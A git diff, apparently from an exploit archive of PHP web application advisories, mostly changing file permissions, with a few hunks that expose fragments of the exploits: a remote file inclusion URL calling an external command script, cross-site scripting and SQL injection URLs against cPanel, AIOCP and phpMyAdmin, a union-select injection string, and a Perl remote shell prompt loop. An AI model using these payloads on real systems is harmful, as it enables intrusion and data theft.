mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28703.txt b/platforms/php/webapps/28703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28704.txt b/platforms/php/webapps/28704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28708.txt b/platforms/php/webapps/28708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28709.txt b/platforms/php/webapps/28709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2871.txt b/platforms/php/webapps/2871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28711.txt b/platforms/php/webapps/28711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28712.txt b/platforms/php/webapps/28712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28714.txt b/platforms/php/webapps/28714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28716.txt b/platforms/php/webapps/28716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28719.txt b/platforms/php/webapps/28719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28720.txt b/platforms/php/webapps/28720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28721.txt b/platforms/php/webapps/28721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28722.txt b/platforms/php/webapps/28722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28723.txt b/platforms/php/webapps/28723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28727.txt b/platforms/php/webapps/28727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28728.txt b/platforms/php/webapps/28728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28729.txt b/platforms/php/webapps/28729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28730.txt b/platforms/php/webapps/28730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28731.txt b/platforms/php/webapps/28731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28732.txt b/platforms/php/webapps/28732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28733.txt b/platforms/php/webapps/28733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28734.txt b/platforms/php/webapps/28734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28736.txt b/platforms/php/webapps/28736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28737.txt b/platforms/php/webapps/28737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28738.txt b/platforms/php/webapps/28738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28740.txt b/platforms/php/webapps/28740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28741.txt b/platforms/php/webapps/28741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28743.txt b/platforms/php/webapps/28743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28744.txt b/platforms/php/webapps/28744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28745.txt b/platforms/php/webapps/28745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28746.txt b/platforms/php/webapps/28746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28747.txt b/platforms/php/webapps/28747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28748.txt b/platforms/php/webapps/28748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28749.txt b/platforms/php/webapps/28749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28750.txt b/platforms/php/webapps/28750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28751.txt b/platforms/php/webapps/28751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28752.txt b/platforms/php/webapps/28752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28753.txt b/platforms/php/webapps/28753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28754.txt b/platforms/php/webapps/28754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28755.txt b/platforms/php/webapps/28755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28756.txt b/platforms/php/webapps/28756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28757.txt b/platforms/php/webapps/28757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28758.txt b/platforms/php/webapps/28758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28759.txt b/platforms/php/webapps/28759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2876.txt b/platforms/php/webapps/2876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28761.txt b/platforms/php/webapps/28761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28767.txt b/platforms/php/webapps/28767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28769.txt b/platforms/php/webapps/28769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2877.txt b/platforms/php/webapps/2877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28770.txt b/platforms/php/webapps/28770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28772.txt b/platforms/php/webapps/28772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28773.txt b/platforms/php/webapps/28773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28774.txt b/platforms/php/webapps/28774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28776.txt b/platforms/php/webapps/28776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28777.txt b/platforms/php/webapps/28777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28778.txt b/platforms/php/webapps/28778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28779.txt b/platforms/php/webapps/28779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2878.txt b/platforms/php/webapps/2878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28780.txt b/platforms/php/webapps/28780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28781.txt b/platforms/php/webapps/28781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28782.txt b/platforms/php/webapps/28782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28783.txt b/platforms/php/webapps/28783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28784.txt b/platforms/php/webapps/28784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28787.txt b/platforms/php/webapps/28787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28790.txt b/platforms/php/webapps/28790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28791.txt b/platforms/php/webapps/28791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28792.txt b/platforms/php/webapps/28792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28793.txt b/platforms/php/webapps/28793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28794.txt b/platforms/php/webapps/28794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28795.php b/platforms/php/webapps/28795.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28796.pl b/platforms/php/webapps/28796.pl index fdc945e5e..2cbb18c19 100755 --- a/platforms/php/webapps/28796.pl +++ b/platforms/php/webapps/28796.pl @@ -102,4 +102,4 @@ HTTP/1.1\r\n"; print "<Shell> "; $cmd = <STDIN>; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/28797.txt b/platforms/php/webapps/28797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28798.txt b/platforms/php/webapps/28798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28799.txt b/platforms/php/webapps/28799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28800.txt b/platforms/php/webapps/28800.txt old mode 100755 new mode 100644 index 8b6e57a90..58d781975 --- a/platforms/php/webapps/28800.txt +++ b/platforms/php/webapps/28800.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application an Version 0.5.4 is vulnerable to these issues; other versions may also be affected. -http://www.example.com/[PATHTOSCR&#304;PT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=l10:32 \ No newline at end of file +http://www.example.com/[PATHTOSCR&#304;PT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=l10:32 \ No newline at end of file diff --git a/platforms/php/webapps/28801.txt b/platforms/php/webapps/28801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28802.txt b/platforms/php/webapps/28802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28803.txt b/platforms/php/webapps/28803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28808.txt b/platforms/php/webapps/28808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28814.txt b/platforms/php/webapps/28814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28815.txt b/platforms/php/webapps/28815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28818.txt b/platforms/php/webapps/28818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28819.txt b/platforms/php/webapps/28819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2882.txt b/platforms/php/webapps/2882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28820.txt b/platforms/php/webapps/28820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28821.txt b/platforms/php/webapps/28821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28824.txt b/platforms/php/webapps/28824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28825.txt b/platforms/php/webapps/28825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28826.txt b/platforms/php/webapps/28826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28827.txt b/platforms/php/webapps/28827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28828.txt b/platforms/php/webapps/28828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2883.txt b/platforms/php/webapps/2883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28831.txt b/platforms/php/webapps/28831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28832.txt b/platforms/php/webapps/28832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28838.txt b/platforms/php/webapps/28838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28839.txt b/platforms/php/webapps/28839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2884.txt b/platforms/php/webapps/2884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28840.txt b/platforms/php/webapps/28840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28842.txt b/platforms/php/webapps/28842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28843.txt b/platforms/php/webapps/28843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28844.txt b/platforms/php/webapps/28844.txt old mode 100755 new mode 100644 index deb0ffcd2..80b399e9e --- a/platforms/php/webapps/28844.txt +++ b/platforms/php/webapps/28844.txt @@ -6,5 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t cPanel version 10.9.0 is vulnerable; other versions may also be affected. -http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] - \ No newline at end of file +http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] \ No newline at end of file diff --git a/platforms/php/webapps/28845.txt b/platforms/php/webapps/28845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28846.html b/platforms/php/webapps/28846.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2885.txt b/platforms/php/webapps/2885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28851.txt b/platforms/php/webapps/28851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28858.txt b/platforms/php/webapps/28858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28859.txt b/platforms/php/webapps/28859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2886.txt b/platforms/php/webapps/2886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28861.txt b/platforms/php/webapps/28861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28862.txt b/platforms/php/webapps/28862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28863.txt b/platforms/php/webapps/28863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28864.txt b/platforms/php/webapps/28864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28865.txt b/platforms/php/webapps/28865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28866.txt b/platforms/php/webapps/28866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28867.txt b/platforms/php/webapps/28867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28868.txt b/platforms/php/webapps/28868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28870.txt b/platforms/php/webapps/28870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28871.txt b/platforms/php/webapps/28871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28872.txt b/platforms/php/webapps/28872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28873.txt b/platforms/php/webapps/28873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28874.txt b/platforms/php/webapps/28874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28875.txt b/platforms/php/webapps/28875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2888.php b/platforms/php/webapps/2888.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28881.txt b/platforms/php/webapps/28881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28882.txt b/platforms/php/webapps/28882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28883.txt b/platforms/php/webapps/28883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28885.php b/platforms/php/webapps/28885.php old mode 100755 new mode 100644 index 26565517a..3cd4698ae --- a/platforms/php/webapps/28885.php +++ b/platforms/php/webapps/28885.php @@ -37,4 +37,4 @@ $data. */ if ($matches[0]) print "<b>Hash: </b>".$matches[0]; } -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/28886.txt b/platforms/php/webapps/28886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28889.txt b/platforms/php/webapps/28889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28890.txt b/platforms/php/webapps/28890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28891.txt b/platforms/php/webapps/28891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28892.txt b/platforms/php/webapps/28892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28896.txt b/platforms/php/webapps/28896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28898.txt b/platforms/php/webapps/28898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28899.txt b/platforms/php/webapps/28899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2890.txt b/platforms/php/webapps/2890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28900.txt b/platforms/php/webapps/28900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28901.txt b/platforms/php/webapps/28901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28902.txt b/platforms/php/webapps/28902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28903.txt b/platforms/php/webapps/28903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28904.txt b/platforms/php/webapps/28904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28905.txt b/platforms/php/webapps/28905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28906.txt b/platforms/php/webapps/28906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28907.txt b/platforms/php/webapps/28907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28908.txt b/platforms/php/webapps/28908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28909.txt b/platforms/php/webapps/28909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2891.txt b/platforms/php/webapps/2891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28913.txt b/platforms/php/webapps/28913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28914.txt b/platforms/php/webapps/28914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28917.txt b/platforms/php/webapps/28917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28918.txt b/platforms/php/webapps/28918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28919.txt b/platforms/php/webapps/28919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28920.txt b/platforms/php/webapps/28920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28921.txt b/platforms/php/webapps/28921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28922.txt b/platforms/php/webapps/28922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28923.txt b/platforms/php/webapps/28923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28924.txt b/platforms/php/webapps/28924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28925.txt b/platforms/php/webapps/28925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28926.txt b/platforms/php/webapps/28926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28927.txt b/platforms/php/webapps/28927.txt old mode 100755 new mode 100644 index 119097689..5c0dc74eb --- a/platforms/php/webapps/28927.txt +++ b/platforms/php/webapps/28927.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql] -http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql] \ No newline at end of file +http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/28928.txt b/platforms/php/webapps/28928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28929.txt b/platforms/php/webapps/28929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28930.txt b/platforms/php/webapps/28930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28931.txt b/platforms/php/webapps/28931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28932.txt b/platforms/php/webapps/28932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28933.txt b/platforms/php/webapps/28933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28934.txt b/platforms/php/webapps/28934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28935.txt b/platforms/php/webapps/28935.txt old mode 100755 new mode 100644 index 23089d4cd..b40b3ae11 --- a/platforms/php/webapps/28935.txt +++ b/platforms/php/webapps/28935.txt @@ -66,4 +66,4 @@ Full Path Disclosure = http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&amp;aiocp_dp[]=_main - http://www.example.com/public/code/cp_show_ec_products.php?order_field[]= -- http://www.example.com/public/code/cp_show_page_help.php?hp[]= \ No newline at end of file +- http://www.example.com/public/code/cp_show_page_help.php?hp[]= \ No newline at end of file diff --git a/platforms/php/webapps/28936.txt b/platforms/php/webapps/28936.txt old mode 100755 new mode 100644 index 838915625..29de656ad --- a/platforms/php/webapps/28936.txt +++ b/platforms/php/webapps/28936.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_show_ec_products.php?order_field[]= \ No newline at end of file +http://www.example.com/public/code/cp_show_ec_products.php?order_field[]= \ No newline at end of file diff --git a/platforms/php/webapps/28937.txt b/platforms/php/webapps/28937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28938.txt b/platforms/php/webapps/28938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28939.txt b/platforms/php/webapps/28939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2894.txt b/platforms/php/webapps/2894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28940.txt b/platforms/php/webapps/28940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28942.txt b/platforms/php/webapps/28942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28943.txt b/platforms/php/webapps/28943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28944.txt b/platforms/php/webapps/28944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28945.txt b/platforms/php/webapps/28945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28946.txt b/platforms/php/webapps/28946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28947.txt b/platforms/php/webapps/28947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28949.txt b/platforms/php/webapps/28949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28950.txt b/platforms/php/webapps/28950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28951.txt b/platforms/php/webapps/28951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28952.txt b/platforms/php/webapps/28952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28953.txt b/platforms/php/webapps/28953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28954.txt b/platforms/php/webapps/28954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28956.txt b/platforms/php/webapps/28956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28959.txt b/platforms/php/webapps/28959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2896.txt b/platforms/php/webapps/2896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28963.txt b/platforms/php/webapps/28963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28964.txt b/platforms/php/webapps/28964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28965.txt b/platforms/php/webapps/28965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28967.txt b/platforms/php/webapps/28967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2897.txt b/platforms/php/webapps/2897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28970.txt b/platforms/php/webapps/28970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2898.txt b/platforms/php/webapps/2898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28980.txt b/platforms/php/webapps/28980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28982.txt b/platforms/php/webapps/28982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28983.txt b/platforms/php/webapps/28983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28988.txt b/platforms/php/webapps/28988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2899.txt b/platforms/php/webapps/2899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28995.txt b/platforms/php/webapps/28995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28998.txt b/platforms/php/webapps/28998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28999.txt b/platforms/php/webapps/28999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29000.txt b/platforms/php/webapps/29000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29001.txt b/platforms/php/webapps/29001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29002.txt b/platforms/php/webapps/29002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29003.txt b/platforms/php/webapps/29003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29004.txt b/platforms/php/webapps/29004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29005.txt b/platforms/php/webapps/29005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29006.txt b/platforms/php/webapps/29006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29017.txt b/platforms/php/webapps/29017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29018.txt b/platforms/php/webapps/29018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29019.txt b/platforms/php/webapps/29019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29020.txt b/platforms/php/webapps/29020.txt old mode 100755 new mode 100644 index eba6e0a73..8e980bd81 --- a/platforms/php/webapps/29020.txt +++ b/platforms/php/webapps/29020.txt @@ -77,4 +77,4 @@ High STATUS ====== -Not Fixed \ No newline at end of file +Not Fixed \ No newline at end of file diff --git a/platforms/php/webapps/29021.txt b/platforms/php/webapps/29021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29023.txt b/platforms/php/webapps/29023.txt old mode 100755 new mode 100644 index da948d67d..a0fee7430 --- a/platforms/php/webapps/29023.txt +++ b/platforms/php/webapps/29023.txt @@ -98,4 +98,4 @@ dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0 " rescue print "\nExploit Failed" -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/php/webapps/29026.txt b/platforms/php/webapps/29026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29027.txt b/platforms/php/webapps/29027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2904.txt b/platforms/php/webapps/2904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29047.txt b/platforms/php/webapps/29047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29049.txt b/platforms/php/webapps/29049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2905.txt b/platforms/php/webapps/2905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29050.txt b/platforms/php/webapps/29050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29051.txt b/platforms/php/webapps/29051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29058.txt b/platforms/php/webapps/29058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29059.txt b/platforms/php/webapps/29059.txt old mode 100755 new mode 100644 index e7c7b6331..2f960e6e2 --- a/platforms/php/webapps/29059.txt +++ b/platforms/php/webapps/29059.txt @@ -6,4 +6,4 @@ An attacker could exploit these vulnerabilities to view sensitive information or All versions of phpMyAdmin are vulnerable. -http://www.example.com/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss] \ No newline at end of file +http://www.example.com/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29060.txt b/platforms/php/webapps/29060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29061.txt b/platforms/php/webapps/29061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29062.txt b/platforms/php/webapps/29062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29065.txt b/platforms/php/webapps/29065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29068.txt b/platforms/php/webapps/29068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29071.txt b/platforms/php/webapps/29071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29072.txt b/platforms/php/webapps/29072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29079.txt b/platforms/php/webapps/29079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29091.txt b/platforms/php/webapps/29091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29095.txt b/platforms/php/webapps/29095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29097.txt b/platforms/php/webapps/29097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29098.txt b/platforms/php/webapps/29098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29099.txt b/platforms/php/webapps/29099.txt old mode 100755 new mode 100644 index 320e4cb0a..784d264cc --- a/platforms/php/webapps/29099.txt +++ b/platforms/php/webapps/29099.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t Version 1.4.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/admin/comments.php?month="><script>alert('Xmors')</script>< \ No newline at end of file +http://www.example.com/[path]/admin/comments.php?month="><script>alert('Xmors')</script>< \ No newline at end of file diff --git a/platforms/php/webapps/29100.txt b/platforms/php/webapps/29100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29101.txt b/platforms/php/webapps/29101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29128.txt b/platforms/php/webapps/29128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2913.php b/platforms/php/webapps/2913.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29145.txt b/platforms/php/webapps/29145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29150.txt b/platforms/php/webapps/29150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29157.txt b/platforms/php/webapps/29157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29158.txt 